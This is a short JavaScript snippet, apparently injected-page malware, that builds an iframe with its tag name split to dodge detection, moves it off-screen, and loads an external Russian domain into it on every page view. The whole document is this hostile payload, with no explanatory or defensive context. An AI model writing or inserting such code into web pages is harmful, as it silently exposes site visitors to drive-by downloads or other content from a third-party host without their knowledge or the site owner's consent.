var frame = document.createElement('ifr'+'ame');
frame.style.position = 'absolute';
frame.style.left = '-1000px';
frame.src='http://izizi.ru';
document.body.appendChild(frame);
